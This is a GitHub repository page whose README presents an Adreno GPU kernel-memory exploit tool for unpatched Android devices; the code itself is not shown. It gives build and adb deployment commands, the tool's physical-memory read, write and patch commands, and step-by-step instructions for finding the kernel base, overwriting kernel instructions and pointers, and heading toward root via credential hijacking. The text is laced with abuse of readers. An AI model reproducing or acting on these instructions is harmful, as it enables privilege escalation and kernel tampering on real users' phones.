Skip to content

unitdevgcc/Adreno_PoC

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 
adrenaline.h
adrenaline.h
 
 
build.sh
build.sh
 
 
exploit.c
exploit.c
 
 

Repository files navigation

exploit (my rework)

runnigga go fuck yourself scriptkid. this one's for people who actually read code.

PoC that uses a CVE-2025-21479 style Adreno 7xx GPU dumb bug to read kernel physical RAM from an unprivileged Android app (no root). Adreno A7xx (Snapdragon 8 Gen 1 / XR2 Gen 2 and newer), unpatched firmware.

Build: export NDK if you need it, then ./build.sh, adb push exploit /data/local/tmp.

Run with no args you get interactive shell. With args it does one command and exits. Examples:

adb shell /data/local/tmp/exploit
adb shell /data/local/tmp/exploit read 0xa8000004
adb shell /data/local/tmp/exploit dump 0xa8000000 512
adb shell /data/local/tmp/exploit write 0xa8001000 0xdeadbeef
adb shell /data/local/tmp/exploit map
adb shell /data/local/tmp/exploit help

Commands. read addr gives one dword at phys addr (hex). dump addr len hex dump, default 256 max 4096. write addr val one dword. patch addr dword dword ... multiple dwords so you can patch code or pointers. search addr range val finds 32 bit value in range. kernel detects kernel phys base (ARMd at +0x38). map prints memory regions. help prints this. quit or exit.

How to patch the kernel. You got phys read/write and want to touch the kernel. We're not giving you a full root chain, device specific, go read cheese or your kernel symbols. Just the idea.

Find where the kernel is. Don't assume 0xa8000000. Run kernel. If it prints kernel_phys_base 0xa8000000 you're good. If not your SoC might use another base, add it to the candidate list in code or set EXPLOIT_PHYADDR and hope the spray lands.

Read the first bytes if you want to be sure. Dump 0xa8000000 64. You should see ARM64 kernel header, at offset 0x38 the magic 0x644d5241 (ARMd). If your base was different use that address.

Pick something to patch. You need the physical address. If you have vmlinux get the virtual address of the symbol from kallsyms or your build. Kernel is usually mapped so phys_base + offset = virt with some fixed offset, so phys = kernel_phys_base + (symbol_virt - kernel_virt_base). kernel_virt_base is often 0xffffffc008000000 or similar. Or search for a known constant. Some function has a literal 0x12345678, run search 0xa8000000 0x100000 0x12345678, get the phys addr, dump around it and see if it's the right spot.

Read before you write. Dump the bytes you're about to overwrite so you can revert. read 0xa80abc00, dump 0xa80abc00 16. Write down the values. If you fuck up you can patch them back.

Patch one dword. Write 0xd503201f (NOP on ARM64) at 0xa80abc00: write 0xa80abc00 0xd503201f. Check with read 0xa80abc00. Should print 0xd503201f.

Patch several dwords. Use patch. Each argument one 32 bit value hex. Four NOPs: patch 0xa80abc00 0xd503201f 0xd503201f 0xd503201f 0xd503201f. Or a pointer, little endian low 32 then high 32. Value 0xffffffc008123456: patch 0xa80abc00 0x08123456 0xffffffc0.

Crossing 4K. 0xa80ab000 and 0xa80ac000 are different pages. The tool does set_target_pa automatically so you can patch 0xa80abffc 0xdeadbeef 0xcafebabe and the second dword is on the next page, it flips target and writes. No need for two patches.

Revert. You saved the original bytes. patch 0xa80abc00 orig1 orig2 ...

Don't patch random shit without knowing what you're overwriting or you get instant crash. Don't assume kernel base or symbol offsets from another device. Same SoC same kernel version maybe. Otherwise get your own vmlinux kallsyms. If you're going for root you need init_cred commit_creds and a syscall to hijack. Device kernel specific. We don't ship that. Use the primitives here and your kernel layout. Thats it. Dont brick your only device.

Auto patch. Tries a bunch of spray phys addrs 0xfebeb000 0xd0b3b000 etc until the completion marker shows up. So you usually don't need to fuck with EXPLOIT_ATTEMPT. Env if you're desperate: EXPLOIT_PHYADDR=0x... force spray target. EXPLOIT_ATTEMPT=0 or 1 or 2 or 3 legacy Nth builtin addr.

Limits. 608 bytes per read chunk then it loops for bigger dumps. Crossing 4K means new set_target_pa and sync. Single write is 4 bytes, patch does many in a row.

Memory map. Run map in the tool. Typical 0xa8000000 kernel 0xfc000000 adreno globals. Layout depends on SoC, check /proc/iomem on device if you have it.

Responsibility. You're a grown ass creature. You run this you own whatever happens. Brick your phone corrupt your kernel get sued, that's on you. We're not liable for shit. If you break something and come crying you're a fucking idiot and we'll treat you like one. Don't expect help. You did it to yourself.

About

Exploit

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages